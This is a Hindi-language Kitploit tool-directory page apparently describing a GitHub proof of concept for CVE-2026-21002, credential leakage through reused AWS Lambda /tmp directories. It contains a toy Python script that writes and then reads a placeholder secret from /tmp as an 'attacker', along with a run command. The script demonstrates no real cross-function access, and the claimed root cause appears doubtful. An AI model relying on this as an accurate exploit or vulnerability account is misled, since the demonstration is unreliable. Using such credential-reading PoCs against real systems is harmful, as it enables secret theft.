Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp — सर्वरलेस कोल्ड-स्टार्ट क्रेडेंशियल लीकेज (CVE-2026-21002) के लिए PoC एक्सप्लॉइट, जो दर्शाता है कि पुनः उपयोग की गई Lambda /tmp निर्देशिकाएँ AWS सीक्रेट्स को अन्य फ़ंक्शनों के सामने कैसे उजागर करती हैं। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
क्लाउड इन्फ्रास्ट्रक्चर सुरक्षाभेद्यता विश्लेषणशोषणसर्वरलेस सुरक्षाडेटा निष्कासनक्लाउड सुरक्षालर्निंग और शिक्षा
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

सर्वरलेस कोल्ड-स्टार्ट क्रेडेंशियल लीकेज (CVE-2026-21002) के लिए PoC एक्सप्लॉइट, जो दर्शाता है कि पुनः उपयोग की गई Lambda /tmp निर्देशिकाएँ AWS सीक्रेट्स को अन्य फ़ंक्शनों के सामने कैसे उजागर करती हैं।

रिपॉजिटरी देखें
17 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-21002 – पुनः उपयोग किए गए /tmp के माध्यम से सर्वरलेस कोल्ड स्टार्ट क्रेडेंशियल लीकेज

प्रोग्राम कोड (Python AWS Lambda सिमुलेशन)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – सर्वरलेस कोल्ड स्टार्ट क्रेडेंशियल लीकेज

Severity: Critical

अवलोकन

सर्वरलेस प्लेटफ़ॉर्म फ़ंक्शन इनवोकेशन के दौरान और यहां तक कि एक ही खाते के विभिन्न फ़ंक्शनों के बीच निष्पादन वातावरण (जिसमें /tmp भी शामिल है) का पुनः उपयोग करते हैं। कोल्ड स्टार्ट के बाद, एक हमलावर का फ़ंक्शन किसी अन्य फ़ंक्शन द्वारा /tmp में छोड़ी गई संवेदनशील फ़ाइलों को पढ़ सकता है, जिससे क्रेडेंशियल की चोरी होती है।

भेद्यता विवरण

  • प्रकार: सूचना प्रकटीकरण / क्रॉस-फ़ंक्शन लीकेज
  • प्रभाव: क्रेडेंशियल समझौता, लैटरल मूवमेंट।
  • मूल कारण: /tmp निर्देशिका फ़ंक्शनों के बीच अलगाव के बिना वार्म कंटेनरों के बीच साझा की जाती है।

एक्सप्लॉइट प्रदर्शन

सिमुलेशन चलाएँ:

root@kitploit:~
python lambda_func_sim.py

हमलावर पीड़ित फ़ंक्शन द्वारा छोड़ा गया AWS_SECRET_ACCESS_KEY पढ़ता है।

टूल डाउनलोड करें